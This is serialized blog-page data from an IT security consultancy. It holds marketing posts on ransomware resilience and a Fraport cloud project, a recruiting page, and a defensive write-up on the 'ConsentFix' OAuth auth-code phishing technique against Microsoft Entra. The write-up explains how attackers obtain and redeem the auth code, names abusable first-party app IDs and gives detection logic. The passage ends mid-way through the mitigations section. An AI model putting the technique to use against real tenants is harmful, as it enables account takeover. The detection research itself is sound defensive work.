nosotros",{"label":18301,"type":2236,"id":2237,"required":2180,"requiredMsg":4192},"Tus datos se almacenarán y se utilizarán para responder a tu solicitud. Más detalles en nuestra \u003Ca href=\"/es/privacy\">Política de Privacidad\u003C/a>.",{"type":2240,"id":2241,"value":2175},{"type":2240,"id":2243,"value":2244},{"type":2240,"id":2246,"value":18305},"Form: Blog Microsoft Security Store | ES",{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},{"type":2240,"id":2254},{"noMargin":2180},{"slick":2180},"/posts/2025-09-30-security-store",{"title":18157,"description":65},"posts/2025-09-30-security-store",[18315,18316,18317],"AI Agents","Security Copilot","Microsoft Seguridad","dwaJ1x1mnd4TCJUd7W2GEBuqPv7iM5zz7Zvq8uOvLvM",{"id":18320,"title":18321,"author":18322,"body":18323,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":18453,"moment":2165,"navigation":2180,"path":18485,"seo":18486,"stem":18487,"tags":18488,"webcast":2167,"__hash__":18490},"content_es/posts/2025-10-07-prevent-cyber-attacks.md","Prevención de ciberataques: Cómo las empresas construyen resiliencia con estructuras de TI",[2460],{"type":9,"value":18324,"toc":18444},[18325,18327,18331,18333,18336,18339,18343,18345,18349,18351,18359,18362,18366,18368,18376,18379,18387,18391,18393,18401,18408,18412,18414,18422,18425,18429,18431,18434,18437],[22,18326],{},[41,18328,18330],{"id":18329},"por-qué-los-ciberataques-tienen-tanto-éxito","Por qué los ciberataques tienen tanto éxito",[12,18332,31],{},[12,18334,18335],{},"Los ataques de ransomware no son una coincidencia. Los atacantes eligen deliberadamente momentos en los que las empresas tienen menos personal, como los fines de semana. Aprovechan vulnerabilidades como procesos de autenticación obsoletos, sistemas sin parches o puntos de acceso mal configurados. Un error común: la falta de un concepto de seguridad unificado. En lugar de una estrategia global bien diseñada, muchas empresas confían en medidas aisladas que resultan insuficientes frente a ataques complejos.",[12,18337,18338],{},"Sin embargo, existen enfoques ampliamente probados: un modelo de seguridad basado en principios de zero trust, así como una estructuración clara de los derechos de acceso y la automatización para permitir una respuesta rápida en caso de emergencia.",[41,18340,18342],{"id":18341},"tres-pilares-para-una-estrategia-de-seguridad-de-ti-sólida","Tres pilares para una estrategia de seguridad de TI sólida",[12,18344,31],{},[41,18346,18348],{"id":18347},"infraestructura-segura-la-base-de-la-resiliencia","Infraestructura segura: la base de la resiliencia",[12,18350,47],{},[12,18352,18353,18354,18358],{},"Una infraestructura de TI resiliente no solo debe funcionar de forma fiable, sino también cerrar activamente las brechas de seguridad. En nuestro ejemplo, fue necesario aislar 300 ordenadores. El primer paso fue, por tanto, la reinstalación completa de un entorno limpio, basado en nuestra ",[2630,18355,18357],{"href":18356},"https://www.glueckkanja.com/es/azure/azure-foundation?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","Azure Foundation",". Esta infraestructura cloud sigue directrices de seguridad claras y se despliega de forma estandarizada mediante Infrastructure-as-Code (IaC). Así, las configuraciones de seguridad pueden comprobarse y actualizarse automáticamente según las mejores prácticas.",[12,18360,18361],{},"Otra ventaja: la aplicación de los principios de zero trust garantiza que las cargas de trabajo estén segmentadas y solo se habiliten para conexiones autorizadas. Así, la superficie de ataque se mantiene al mínimo.",[41,18363,18365],{"id":18364},"la-seguridad-comienza-con-la-autenticación","La seguridad comienza con la autenticación",[12,18367,47],{},[12,18369,18370,18371,18375],{},"En casi todos los ciberataques, la gestión de identidades es el primer punto de ataque. Las contraseñas solas ya no son suficientes. Con ",[2630,18372,18374],{"href":18373},"https://www.glueckkanja.com/es/modern-workplace/azure-active-directory?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","Entra ID",", las cuentas de usuario pueden se gestionan y protegen de forma centralizada. La autenticación multifactor (MFA) es el estándar.",[12,18377,18378],{},"Otra ventaja: las actividades sospechosas se detectan y revisan automáticamente. Por ejemplo, si un usuario inicia sesión desde otra ubicación en pocos minutos, el sistema lo identifica como posible amenaza y bloquea el acceso de inmediato.",[12,18380,18381,18382,18386],{},"Para detectar atacantes en la infraestructura, se utilizan sistemas avanzados como Extended Detection and Response (XDR) y Security Information and Event Management (SIEM). Estas soluciones consolidan alarmas y eventos, los analizan y permiten una evaluación rápida. Un SOC gestionado, como el ",[2630,18383,18385],{"href":18384},"https://www.glueckkanja.com/es/security/cloud-security-operations-center?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","Cloud Security Operations Center"," de glueckkanja, ayuda a aprovechar al máximo estas tecnologías.",[41,18388,18390],{"id":18389},"restaurar-los-puestos-de-trabajo-rápidamente","Restaurar los puestos de trabajo rápidamente",[12,18392,47],{},[12,18394,18395,18396,18400],{},"Tras un ataque, los empleados deben poder reanudar su trabajo lo antes posible. Las soluciones en la nube como ",[2630,18397,18399],{"href":18398},"https://www.glueckkanja.com/es/modern-workplace/microsoft-intune?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","Microsoft Intune"," son esenciales para lograrlo. Los dispositivos pueden restablecerse y configurarse por completo desde un portal central, sin importar la ubicación del usuario.",[12,18402,18403,18404,18407],{},"La ventaja: los empleados pueden realizar el proceso ellos mismos sin que el departamento de TI tenga que configurar manualmente cada dispositivo. Además, plataformas como ",[2630,18405,18237],{"href":18406},"https://www.realmjoin.com/?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article"," distribuyen automáticamente todos los paquetes de software necesarios y aseguran la instalación de las actualizaciones de seguridad.",[41,18409,18411],{"id":18410},"protección-de-emergencia-azere-como-solución-de-contingencia","Protección de emergencia: AzERE como solución de contingencia",[12,18413,31],{},[12,18415,18416,18417,18421],{},"Un incidente como este demuestra lo importante que es contar con una estrategia de emergencia. ",[2630,18418,18420],{"href":18419},"https://www.glueckkanja.com/es/azure/azure-emergency-response-environment?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","AzERE"," (Azure Emergency Response Environment) ofrece un entorno aislado en el que sistemas críticos como el controlador de dominio se replican en una instancia segura “Dark Tenant”. Esto permite acceder a una versión limpia de los datos, incluso ante un ataque a gran escala.",[12,18423,18424],{},"Además, AzERE facilita la creación de una “War Room” digital: una plataforma donde todas las partes implicadas se reúnen para coordinar acciones en tiempo real. Esta capacidad de comunicación central puede ser decisiva cuando cada minuto cuenta.",[41,18426,18428],{"id":18427},"conclusión-resiliencia-proactiva-en-lugar-de-reaccionar-ante-amenazas","Conclusión: resiliencia proactiva en lugar de reaccionar ante amenazas",[12,18430,31],{},[12,18432,18433],{},"Este incidente demuestra que un concepto de seguridad efectivo requiere más que soluciones aisladas. Se necesita una combinación de infraestructura cloud segura, gestión de identidades robusta y un entorno de trabajo moderno que pueda restaurarse rápidamente.",[12,18435,18436],{},"Y por eso nuestras historias de IT Workaholics tratan sobre personas cuyas operaciones de TI hemos logrado llevar del modo crisis a la normalidad.",[12,18438,18439,18440,1266],{},"¡Lee ahora las ",[2630,18441,18443],{"href":18442},"https://www.glueckkanja.com/es/it-workaholics?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","historias de IT Workaholics",{"title":65,"searchDepth":111,"depth":111,"links":18445},[18446,18447,18448,18449,18450,18451,18452],{"id":18329,"depth":111,"text":18330},{"id":18341,"depth":111,"text":18342},{"id":18347,"depth":111,"text":18348},{"id":18364,"depth":111,"text":18365},{"id":18389,"depth":111,"text":18390},{"id":18410,"depth":111,"text":18411},{"id":18427,"depth":111,"text":18428},{"lang":2170,"seoTitle":18454,"titleClass":2172,"date":18455,"categories":18456,"blogtitlepic":18457,"socialimg":18458,"customExcerpt":18459,"keywords":18460,"contactInContent":18461,"hreflang":18478,"footer":18483,"scripts":18484,"published":2180},"Prevención de ciberataques: Cómo las empresas construyen resiliencia con estructuras de TI ","2025-10-07",[2175],"head-preventing-cyber-attacks","/blog/heads/head-preventing-cyber-attacks.png","Sábado por la mañana, en algún lugar de Alemania. Mientras muchos apenas comienzan el fin de semana, nuestro equipo detecta las primeras señales de alerta en los sistemas de una empresa cliente: actividades inusuales que encienden todas las alarmas. Un análisis rápido confirma la sospecha: ransomware. En cuestión de minutos, los sistemas críticos quedan comprometidos. Lo que sigue es una carrera contrarreloj: asegurar los sistemas, aislar las áreas críticas y comenzar el proceso de recuperación.","Security, CSOC, Microsoft Security, Cyber Attacks, Prevention",{"quote":2180,"infos":18462},{"bgColor":2200,"headline":18288,"subline":18289,"level":41,"textStyling":2203,"flush":2204,"person":18463,"form":18464},{"image":2206,"cloudinary":2180,"alt":2207,"name":2208,"quotee":2208,"quoteeTitle":2209,"quote":18291},{"ctaText":2212,"cta":18465,"method":2168,"action":2215,"fields":18466},{"skin":2214},[18467,18468,18469,18470,18471,18472,18473,18474,18475,18476,18477],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":4181},{"label":2222,"type":61,"id":2223,"required":2180,"requiredMsg":4183},{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":4186},{"label":18299,"type":2231,"id":2232,"required":2167,"requiredMsg":4428},{"label":18301,"type":2236,"id":2237,"required":2180,"requiredMsg":4192},{"type":2240,"id":2241,"value":2175},{"type":2240,"id":2243,"value":2244},{"type":2240,"id":2246,"value":18305},{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},{"type":2240,"id":2254},[18479,18481],{"lang":2260,"href":18480},"/de/posts/2025-10-07-prevent-cyber-attacks.md",{"lang":2257,"href":18482},"/en/posts/2025-10-07-prevent-cyber-attacks.md",{"noMargin":2180},{"slick":2180},"/posts/2025-10-07-prevent-cyber-attacks",{"title":18321,"description":65},"posts/2025-10-07-prevent-cyber-attacks",[2175,18489],"CSOC","8XfvGmoc_Vp9I7eKLekOYvL5JXu6Qkohzojhk_usGdQ",{"id":18492,"title":18493,"author":18494,"body":18495,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":18574,"moment":18575,"navigation":2180,"path":18622,"seo":18623,"stem":18624,"tags":18625,"webcast":2167,"__hash__":18626},"content_es/posts/2025-11-12-partner-of-the-year-awards.md","Cloud-first at the airport: Microsoft Partner of the Year Awards 2025",[2460],{"type":9,"value":18496,"toc":18568},[18497,18501,18503,18506,18509,18513,18515,18518,18521,18535,18538,18542,18546,18548,18551,18555,18557,18560],[41,18498,18500],{"id":18499},"from-the-runway-to-the-cloud","From the runway to the cloud",[12,18502,31],{},[12,18504,18505],{},"Fraport operates 29 airports worldwide, including Frankfurt Airport, one of Europe's largest transportation hubs. More than 80,000 employees keep operations running every day, from baggage handling to IT security. To make all this work, you need a reliable, scalable, and secure digital infrastructure.",[12,18507,18508],{},"That's where the joint project between Fraport and glueckkanja came in: the existing VDI environment was to be replaced with a modern, cloud-based workplace architecture. The goal: more flexibility, less complexity, and a platform built for a globally connected organization.",[41,18510,18512],{"id":18511},"cloud-managed-workplace","Cloud Managed Workplace",[12,18514,31],{},[12,18516,18517],{},"At the core lies the combination of Windows 365 Cloud PCs and the Microsoft Intune Suite. Today, more than 16,500 endpoints are centrally deployed, managed, and secured.",[12,18519,18520],{},"The results:",[1255,18522,18523,18526,18529,18532],{},[1258,18524,18525],{},"Device provisioning in minutes instead of hours",[1258,18527,18528],{},"Automated processes for higher efficiency",[1258,18530,18531],{},"Transparent management and monitoring",[1258,18533,18534],{},"A Zero Trust security model across all devices",[12,18536,18537],{},"The outcome: a workplace concept that enables Fraport employees to work securely and flexibly across all locations, devices, and roles.",[2688,18539],{":quotes":18540,":no-fullscreen":7656,"spacing":18541},"quoteMicrosoft","mb-10",[41,18543,18545],{"id":18544},"recognition-for-innovation-and-collaboration","Recognition for innovation and collaboration",[12,18547,31],{},[12,18549,18550],{},"Each year, Microsoft honors partners who deliver outstanding cloud solutions, services, and innovations. In a global competition with more than 4,600 submissions, glueckkanja was recognized for the successful implementation of the Fraport project, a strong signal for the growing importance of cloud-based workplace solutions in critical infrastructures.",[41,18552,18554],{"id":18553},"a-blueprint-for-modern-workplace-architecture","A blueprint for modern workplace architecture",[12,18556,31],{},[12,18558,18559],{},"This project demonstrates how complex infrastructures can be reimagined through the cloud — without compromising on security or user experience. For Fraport, it marked the move to a standardized, cloud-based workplace model. For glueckkanja, it’s a proof point of how modern IT strategies can scale sustainably.",[12,18561,18562,18563,1014],{},"The full list of award-winning projects can be found ",[2630,18564,18567],{"href":18565,"rel":18566},"https://aka.ms/2025POTYAWinnersFinalists",[3135],"here",{"title":65,"searchDepth":111,"depth":111,"links":18569},[18570,18571,18572,18573],{"id":18499,"depth":111,"text":18500},{"id":18511,"depth":111,"text":18512},{"id":18544,"depth":111,"text":18545},{"id":18553,"depth":111,"text":18554},{"lang":2170,"seoTitle":18493,"titleClass":2172,"date":18575,"categories":18576,"blogtitlepic":18577,"socialimg":18578,"customExcerpt":18579,"keywords":18580,"contactInContent":18581,"hreflang":18610,"scripts":18615,"quoteMicrosoft":18616},"2025-11-12",[2663],"head-partner-of-the-year-2025","/heads/head-partner-of-the-year-2025.jpg","Out of more than 4,600 nominations from over 100 countries, one project stood out as a showcase of what modern IT can look like: together with Fraport, glueckkanja was recognized at the Microsoft Partner of the Year Awards 2025 in the Cloud Endpoints category.","Microsoft Partner of the Year Awards 2025, Cloud Endpoints Award, glueckkanja Fraport, Fraport Microsoft Case Study, Windows 365 Cloud PC, Microsoft Intune Suite, Cloud Managed Workplace, Azure Cloud Migration, Zero Trust Security, Modern Workplace, Cloud-first strategy, Digital workplace transformation, Endpoint management, Device provisioning automation, Secure cloud infrastructure, Scalable IT architecture, Cloud governance and compliance, Enterprise mobility and security, Airport IT infrastructure, Aviation digital transformation, Critical infrastructure IT, Global operations, Remote workforce enablement, IT modernization in transportation, Cloud-based workplace for critical infrastructure, Microsoft Windows 365 and Intune in enterprise environments, Secure and scalable endpoint management, Transforming airport IT operations with Azure",{"quote":2180,"infos":18582},{"bgColor":2200,"color":2993,"boxBgColor":2992,"boxColor":2993,"headline":18583,"subline":18584,"level":41,"textStyling":2203,"flush":2204,"person":18585,"form":18591},"Get in Touch","Want to learn more about the project and our award? We'd be happy to show you how Fraport’s journey toward a standardized cloud architecture was brought to life.",{"image":2996,"cloudinary":2180,"alt":2419,"name":2419,"quotee":2419,"quoteeTitle":2997,"quote":18586,"detailsHeader":18587,"details":18588},"The project with Fraport shows how standardization and automation can enable a secure, scalable workplace model, exactly what's needed to run and evolve IT environments reliably over the long term.","We’re looking forward\u003Cbr />to hearing from you!",[18589,18590],{"text":2812,"href":2813,"details":3001,"icon":2815},{"text":2817,"href":2818,"icon":2819},{"ctaText":18592,"cta":18593,"method":2168,"action":16992,"fields":18594},"Submit",{"skin":2214},[18595,18596,18597,18598,18601,18603,18604,18605,18607,18608,18609],{"label":16995,"type":61,"id":2219,"required":2180,"requiredMsg":16996},{"label":16998,"type":61,"id":2223,"required":2180,"requiredMsg":16999},{"label":17001,"type":2227,"id":2227,"required":2180,"requiredMsg":17002},{"label":18599,"type":2231,"id":2232,"required":2167,"requiredMsg":18600},"Your message to us","Please enter a message.",{"label":18602,"type":2236,"id":2237,"required":2180,"requiredMsg":17005},"Your data will be stored and used to respond to your request. For more details, please see our \u003Ca href=\"/en/privacy\">Privacy Policy\u003C/a>.",{"type":2240,"id":2241,"value":2663},{"type":2240,"id":2243,"value":2244},{"type":2240,"id":2246,"value":18606},"Form: Blog Microsoft Partner of the Year | EN",{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},{"type":2240,"id":2254},[18611,18613],{"lang":2257,"href":18612},"/en/posts/2025-11-12-partner-of-the-year-awards",{"lang":2260,"href":18614},"/de/posts/2025-11-12-partner-of-the-year-awards",{"slick":2180,"form":2180},{"items":18617},[18618],{"text":18619,"name":18620,"company":18621,"alt":18620},"By moving to Windows 365 Cloud PCs and the Intune Suite, we've achieved a new level of agility and security. The collaboration with glueckkanja has laid the foundation for future innovation.","Niklas Rast","Senior Solution Architect at Fraport","/posts/2025-11-12-partner-of-the-year-awards",{"title":18493,"description":65},"posts/2025-11-12-partner-of-the-year-awards",[2719,3025],"pbzKYH6UV-drvjQPoYsGjV6CUVlyIqlW-2gGPswAr_w",{"id":18628,"title":18629,"author":18630,"body":18631,"cta":2165,"description":18635,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":18732,"moment":18733,"navigation":2180,"path":18745,"seo":18746,"stem":18747,"tags":18748,"webcast":2167,"__hash__":18749},"content_es/posts/2025-12-08-recruiting-process.md","Nuestro Proceso de Solicitud Explicado",[2550],{"type":9,"value":18632,"toc":18724},[18633,18636,18639,18642,18653,18657,18659,18662,18665,18669,18671,18674,18685,18688,18692,18694,18697,18701,18703,18706,18710,18712,18715,18719,18721],[12,18634,18635],{},"A menudo nos preguntan: ¿Qué necesito aportar y qué es importante para ustedes?",[12,18637,18638],{},"Lo que es importante para nosotros es que estés entusiasmado por trabajar en una empresa tecnológica innovadora. Nos vemos como un equipo que tira en la misma dirección.",[12,18640,18641],{},"Y estamos buscando personas que sean tan apasionadas por la tecnología como nosotros:",[1255,18643,18644,18647,18650],{},[1258,18645,18646],{},"Que no rehúyan los desafíos sino que prosperen cuando pueden sumergirse en temas complejos.",[1258,18648,18649],{},"Que cuestionen el status quo y desarrollen apasionadamente nuevas soluciones innovadoras – para glueckkanja y nuestros clientes.",[1258,18651,18652],{},"Que disfruten ser parte de una comunidad, compartiendo su conocimiento y aprendiendo unos de otros.",[186,18654,18656],{"id":18655},"paso-1-tu-solicitud","Paso 1: Tu Solicitud",[12,18658,31],{},[12,18660,18661],{},"Has enviado tus documentos – ¡el primer paso está hecho! En nuestra empresa, ninguna IA revisa tu solicitud, sino nuestro equipo de reclutamiento personalmente. ¿Te preguntas quién está detrás del equipo de reclutamiento? ¡Aquí estamos!",[12,18663,18664],{},"Nosotros – eso es Kerstin, Anna, Steffi y Jan – nos tomamos el tiempo para revisar cuidadosamente tu CV y verificar si tu experiencia y habilidades coinciden con nuestros requisitos. Nuestro objetivo: Recibirás comentarios de nosotros en máximo 1–2 semanas, pero generalmente después de solo unos días. Sabemos lo angustiosa que puede ser la espera.",[186,18666,18668],{"id":18667},"paso-2-conociendo-a-las-personas-y-la-cultura","Paso 2: Conociendo a las Personas y la Cultura",[12,18670,31],{},[12,18672,18673],{},"Si tu perfil encaja, pasamos a la primera ronda. No te preocupes – ¡no necesitas estar nervioso! Ya has causado una gran primera impresión con tu CV. En la conversación, queremos conocerte como persona:",[1255,18675,18676,18679,18682],{},[1258,18677,18678],{},"¿Quién eres?",[1258,18680,18681],{},"¿Qué te motiva?",[1258,18683,18684],{},"¿Qué buscas en tu futuro?",[12,18686,18687],{},"Se trata de un encuentro abierto y honesto de igual a igual.",[186,18689,18691],{"id":18690},"paso-3-intercambio-técnico-con-tu-futuro-líder","Paso 3: Intercambio Técnico con tu Futuro Líder",[12,18693,31],{},[12,18695,18696],{},"En la segunda conversación, conocerás a tu líder. Ahora se pone un poco más técnico: Discutimos tus habilidades profesionales y puedes hacer todas las preguntas sobre tareas, equipo y proyectos. Un poco de emoción es natural – ¡pero hey, ya estás un paso más adelante!",[186,18698,18700],{"id":18699},"paso-4-encuentro-con-el-equipo-y-verificación-cultural","Paso 4: Encuentro con el Equipo y Verificación Cultural",[12,18702,31],{},[12,18704,18705],{},"En glueckkanja, la cultura es más que una palabra – es nuestra vida diaria. Por eso en el último paso conocerás a tu equipo potencial. Queremos asegurar que sea un buen ajuste para ambas partes – profesional y personalmente.",[186,18707,18709],{"id":18708},"final-tu-oferta","Final: Tu Oferta",[12,18711,31],{},[12,18713,18714],{},"¿Nos has convencido? Entonces viene la conversación personal de oferta. Aquí aclaramos todos los detalles sobre la oferta y respondemos todas tus preguntas finales.",[186,18716,18718],{"id":18717},"por-qué-tantos-pasos","¿Por Qué Tantos Pasos?",[12,18720,31],{},[12,18722,18723],{},"Simple: Queremos asegurar que te sientas cómodo con nosotros y que tengamos éxito juntos. Todas las conversaciones se realizan de igual a igual – y el tuteo es natural para nosotros.",{"title":65,"searchDepth":111,"depth":111,"links":18725},[18726,18727,18728,18729,18730,18731],{"id":18655,"depth":329,"text":18656},{"id":18667,"depth":329,"text":18668},{"id":18690,"depth":329,"text":18691},{"id":18699,"depth":329,"text":18700},{"id":18708,"depth":329,"text":18709},{"id":18717,"depth":329,"text":18718},{"lang":2170,"seoTitle":18629,"titleClass":2172,"date":18733,"categories":18734,"blogtitlepic":18735,"socialimg":18736,"customExcerpt":18737,"keywords":18738,"hreflang":18739,"scripts":18744},"2025-12-08",[2663],"head-recruiting-process","/heads/head-recruiting-process.png","¿Has descubierto una posición emocionante con nosotros y quieres postularte? Genial – ¡siempre estamos felices de dar la bienvenida a nuevos talentos! ¿Pero qué sucede después de hacer clic en 'Enviar Solicitud'? Aquí te damos una mirada detrás de escena.","Reclutamiento, Proceso de Solicitud, Empleos en Empresa de TI",[18740,18742],{"lang":2260,"href":18741},"/de/posts/2025-12-08-recruiting-process.md",{"lang":2257,"href":18743},"/en/posts/2025-12-08-recruiting-process.md",{"slick":2180,"form":2180},"/posts/2025-12-08-recruiting-process",{"title":18629,"description":18635},"posts/2025-12-08-recruiting-process",[3096,3097,3095],"Rt9E79kYvWE03E5zZ0R4APgXGYB1thZZ6XX0UMasOuc",{"id":18751,"title":18752,"author":18753,"body":18754,"cta":2165,"description":18758,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":19536,"moment":19538,"navigation":2180,"path":19564,"seo":19565,"stem":19566,"tags":19567,"webcast":2167,"__hash__":19570},"content_es/posts/2025-12-31-vulnerability-consentfix.md","AuthCodeFix aka ConsentFix",[2493,2372,2529],{"type":9,"value":18755,"toc":19516},[18756,18759,18762,18765,18771,18774,18777,18786,18791,18799,18819,18822,18828,18831,18834,18840,18845,18849,18859,18865,18868,18871,18875,18878,18884,18891,18894,18914,18924,18928,18931,18934,18937,18940,18944,18947,18950,18967,18976,18980,18984,19004,19008,19013,19024,19027,19033,19037,19051,19055,19066,19070,19073,19081,19084,19092,19095,19103,19107,19110,19131,19134,19198,19201,19204,19207,19210,19213,19219,19222,19263,19267,19282,19286,19290,19304,19307,19310,19315,19318,19329,19333,19340,19344,19350,19355,19369,19375,19381,19387,19398,19401,19407,19410,19435,19443,19447,19467,19473,19476,19482,19486],[12,18757,18758],{},"As it is tradition right before the end of the year, a new vulnerability or clever attack vector appears, and Defenders are left trying to protect their users. Meanwhile, other attackers and red teamers watch closely and adapt.",[12,18760,18761],{},"This year, PushSecurity detected an attack that they named \"ConsentFix\", an evolution of the ClickFix attack that relies on the user to provide the attacker with a URI that basically hands over the key to the Entra kingdom. The method used in the wild relied on a manual copy and paste action by the user to work. Within a few days, John Hammond released a video demonstrating an improved version of the attack that no longer required copy and paste, instead, the user could simply drag and drop their auth code to the attacker.",[12,18763,18764],{},"When we look into the technical details of why this attack works and seemingly bypasses device compliance and other Conditional Access requirements, we find ourselves in the OAuth 2.0 authorization code flow.",[12,18766,18767],{},[2772,18768],{"alt":18769,"src":18770},"OAuth 2.0 authorization code flow","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-01.png",[12,18772,18773],{},"The attacker creates a Microsoft Entra login URI that targets the \"Microsoft Azure CLI\" client and the \"Azure Resource Manager\" resource, and opens this URI when the user visits the malicious website.",[12,18775,18776],{},"Mapped to the authorization code flow, this corresponds to the first step that a native public app such as the Azure CLI would normally call to authenticate the user. The application creates a listener on the machine on which it is executed, on a random high port. This port is used as a so called reply URI.",[12,18778,18779,18780,18785],{},"You can easily reproduce this yourself, for example by using ",[2630,18781,18784],{"href":18782,"rel":18783},"https://github.com/f-bader/TokenTacticsV2",[3135],"TokenTacticsV2",", or by crafting the URI manually.",[12,18787,18788],{},[2772,18789],{"alt":18784,"src":18790},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-02.png",[12,18792,18793,18794,18798],{},"After the user successfully signs into Entra ID, the user is redirected to the reply URI, e.g., ",[2630,18795,18796],{"href":18796,"rel":18797},"http://localhost:3001",[3135],". In a normal scenario, the Azure CLI would now accept the call to this URI and would receive the important and critical information that is part of the redirect:",[1255,18800,18801,18811],{},[1258,18802,18803,18805,18807,18808,18810],{},[251,18804,63],{},[531,18806],{},"\nThis is the authorization_code, which the application uses to request a bearer token, which consists of access, ID, and optionally the refresh token.",[531,18809],{},"\nAccording to the documentation, this code is valid for around 10 minutes and must be redeemed within this time.",[1258,18812,18813,18816,18818],{},[251,18814,18815],{},"state",[531,18817],{},"\nThis is an optional parameter, and the application should verify whether it is identical in the request and response.",[12,18820,18821],{},"In the attack scenario, the user is also redirected, but since no application is running on localhost, the browser encounters an error.",[12,18823,18824],{},[2772,18825],{"alt":18826,"src":18827},"The browser runs into an error","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-03.png",[12,18829,18830],{},"But the URI still contains the sensitive information and this is what the attacker wants the user to provide them. If the user obliges the attacker will now redeem the token material and can then use the access and refresh token to access the resource, in this case Azure Resource Manager.",[12,18832,18833],{},"In this screenshot you will see how to retrieve the bearer token using the URI provided by the user.",[12,18835,18836],{},[2772,18837],{"alt":18838,"src":18839},"Bearer token using the URI provided by the user","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-04.png",[2109,18841,18842],{},[12,18843,18844],{},"If you want to test your detections, make sure you execute the last step from a different system, in a different network.",[41,18846,18848],{"id":18847},"detection-artifacts","Detection artifacts",[12,18850,18851,18852,4598,18855,18858],{},"When you reproduce the attack and check the ",[63,18853,18854],{},"SigninLogs",[63,18856,18857],{},"AADNonInteractiveUserSignInLogs",", you'll see two events for this single sign-in activity. The first event represents the actual user sign-in, while the second originates from the attacker's infrastructure.",[12,18860,18861],{},[2772,18862],{"alt":18863,"src":18864},"Activity Log","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-05.png",[12,18866,18867],{},"The big difference is that the first event is an interactive sign in event, while the second is non-interactive. This translates to the two stages of the authentication flow: first the user, then the application or in our case the attacker.",[12,18869,18870],{},"Regular behavior of the Azure CLI would be that both sign-in events originate from the same IP address. However, in our case the IP addresses are different, and they originate from different countries. Of course, the latter is not a reliable indicator, as the attacker could reside in the same country as the victim to hide their tracks.",[186,18872,18874],{"id":18873},"missing-link","Missing link",[12,18876,18877],{},"When looking for a good way to link those two events, the natural first idea was to check the Unique Token Identifier (UTI). However, Microsoft uses different values for the authorization code UTI and the bearer token UTI, so this approach doesn't work as a reliable link.",[12,18879,18880],{},[2772,18881],{"alt":18882,"src":18883},"Unique Token Identifier","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-06.png",[12,18885,18886,18887,18890],{},"However, the ",[63,18888,18889],{},"SessionId"," is a good link between the two, though it is a long-running ID and might contain multiple of these event combinations, even legitimate ones.",[12,18892,18893],{},"With the additional knowledge of the auth code flow limitations and the user and application id as additional links you can use time as an important detection factor:",[1255,18895,18896,18899,18902,18905,18908,18911],{},[1258,18897,18898],{},"Both events share the same SessionId",[1258,18900,18901],{},"Both events share the same ApplicationId",[1258,18903,18904],{},"Both events share the same UserId",[1258,18906,18907],{},"The second event must be after the first event",[1258,18909,18910],{},"The second event must be within approximately a 10-minute time window after the first event. You should not use exactly 10 minutes as Microsoft writes \"[...] they expire after about 10 minutes\"",[1258,18912,18913],{},"You should only consider the very next second event, not subsequent ones",[2109,18915,18916],{},[12,18917,18918,18921,18923],{},[251,18919,18920],{},"Fun fact",[531,18922],{},"\nThe ResourceIdentity is not a good link, as the attacker can change the resource since it is not bound to the auth code. The targeted application ID cannot be changed.",[41,18925,18927],{"id":18926},"reduce-the-noise","Reduce the noise",[12,18929,18930],{},"This knowledge already provided us with a good working detection, but there were benign positives in the mix as well. Modern developers use cloud resources that appear like local instances, but result in irregular login patterns in the logs.",[12,18932,18933],{},"The key difference is the time component. While the attack requires user interaction to copy and paste or drag and drop the URI, the GitHub Codespace use case we identified as the source of the benign positive alerts is completely automated and redeems the auth code within mere seconds.",[12,18935,18936],{},"So filtering out anything that does this authentication dance within a few seconds can most likely be removed as benign.",[12,18938,18939],{},"Another source of noise could be changing egress points for your internet traffic, especially in SD-WAN, ZTNA or Secure Web Gateway scenarios.",[41,18941,18943],{"id":18942},"affected-first-party-applications","Affected first-party applications",[12,18945,18946],{},"While the initial report shows \"Microsoft Azure CLI\" as the abused application there are a lot of different Microsoft first-party apps with pre-consent in every tenant that offer localhost as redirect. And not only those are a target. The attacker could also abuse reply test and dev URLs that are not publicly resolvable.",[12,18948,18949],{},"Here is a list of the most notable applications that also have high pre-consentet permissions on resources.",[1255,18951,18952,18955,18958,18961,18964],{},[1258,18953,18954],{},"Microsoft Azure CLI (04b07795-8ddb-461a-bbee-02f9e1bf7b46)",[1258,18956,18957],{},"Microsoft Azure PowerShell (1950a258-227b-4e31-a9cf-717495945fc2)",[1258,18959,18960],{},"Visual Studio (04f0c124-f2bc-4f59-8241-bf6df9866bbd)",[1258,18962,18963],{},"Visual Studio Code (aebc6443-996d-45c2-90f0-388ff96faa56)",[1258,18965,18966],{},"MS Teams PowerShell Cmdlets (12128f48-ec9e-42f0-b203-ea49fb6af367)",[12,18968,18969,18970,18975],{},"A full list of these apps are now included in ",[2630,18971,18974],{"href":18972,"rel":18973},"https://entrascopes.com/?authcodeFix=true",[3135],"EntraScopes.com"," by our colleague Fabian Bader.",[41,18977,18979],{"id":18978},"mitigations-and-protections","Mitigations and Protections",[186,18981,18983],{"id":18982},"limit-the-attack-surface-and-audience","Limit the attack surface and audience",[52,18985,18988,18991,18992,18994,18997,18998,19000,19003],{"className":18986},[18987],"option-block",[251,18989,18990],{},"Deployment effort:"," Low to High (depends on effort to identify legitimate 